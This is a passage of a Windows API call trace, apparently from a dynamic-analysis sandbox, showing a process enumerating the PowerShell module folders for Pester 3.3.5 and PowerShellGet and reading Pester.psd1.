ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0182.243] FindClose (in: hFindFile=0x1a9b68a0 | out: hFindFile=0x1a9b68a0) returned 1 [0182.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8f0) returned 1 [0182.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8b0) returned 1 [0182.243] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7dd530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0182.244] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7dd590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0182.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd9d0) returned 1 [0182.244] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddab0 | out: lpFileInformation=0x1b7ddab0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0182.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd990) returned 1 [0182.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dda00) returned 1 [0182.244] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7dd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0182.244] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0182.244] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b7dd6a0 | out: lpFindFileData=0x1b7dd6a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6ae0 [0182.244] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.244] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0182.245] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0182.245] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0182.245] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0182.245] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0182.245] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0182.245] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0182.246] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0182.246] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0182.246] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0182.246] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0182.246] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0182.246] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0182.247] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0182.247] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.247] FindClose (in: hFindFile=0x1a9b6ae0 | out: hFindFile=0x1a9b6ae0) returned 1 [0182.247] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd950) returned 1 [0182.247] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd910) returned 1 [0182.247] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0182.247] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0182.247] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0182.252] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0182.253] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0182.253] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7dd720, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0182.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb60) returned 1 [0182.253] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddc40 | out: lpFileInformation=0x1b7ddc40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0182.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb20) returned 1 [0182.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb90) returned 1 [0182.253] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7dd680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0182.253] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0182.253] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b7dd830 | out: lpFindFileData=0x1b7dd830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b68a0 [0182.254] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.254] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0182.254] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.254] FindClose (in: hFindFile=0x1a9b68a0 | out: hFindFile=0x1a9b68a0) returned 1 [0182.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddae0) returned 1 [0182.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddaa0) returned 1 [0182.254] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0182.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddbd0) returned 1 [0182.255] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddcb0 | out: lpFileInformation=0x1b7ddcb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0182.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb90) returned 1 [0182.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0182.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd970) returned 1 [0182.255] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6cc [0182.255] GetFileType (hFile=0x6cc) returned 0x1 [0182.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8e0) returned 1 [0182.255] GetFileType (hFile=0x6cc) returned 0x1 [0182.256] ReadFile (in: hFile=0x6cc, lpBuffer=0x21a8678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21a8678*, lpNumberOfBytesRead=0x1b7dda48*=0x1000, lpOverlapped=0x0) returned 1 [0182.256] ReadFile (in: hFile=0x6cc, lpBuffer=0x21a8678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21a8678*, lpNumberOfBytesRead=0x1b7dda48*=0x1000, lpOverlapped=0x0) returned 1 [0182.256] ReadFile (in: hFile=0x6cc, lpBuffer=0x21a8678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21a8678*, lpNumberOfBytesRead=0x1b7dda48*=0x1000, lpOverlapped=0x0) returned 1 [0182.257] ReadFile (in: hFile=0x6cc, lpBuffer=0x21a8678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21a8678*, lpNumberOfBytesRead=0x1b7dda48*=0x5e5, lpOverlapped=0x0) returned 1 [0182.257] ReadFile (in: hFile=0x6cc, lpBuffer=0x21a7b9d, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21a7b9d*, lpNumberOfBytesRead=0x1b7dda48*=0x0, lpOverlapped=0x0) returned 1 [0182.257] ReadFile (in: hFile=0x6cc, lpBuffer=0x21a8678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21a8678*, lpNumberOfBytesRead=0x1b7dda48*=0x0, lpOverlapped=0x0) returned 1 [0182.257] CloseHandle (hObject=0x6cc) returned 1 [0182.259] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0182.259] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0182.259] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0182.260] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0182.260] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0182.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0182.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0182.260] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6900 [0182.261] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.261] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0182.261] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.261] FindClose (in: hFindFile=0x1a9b6900 | out: hFindFile=0x1a9b6900) returned 1 [0182.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.261] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0182.262] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program 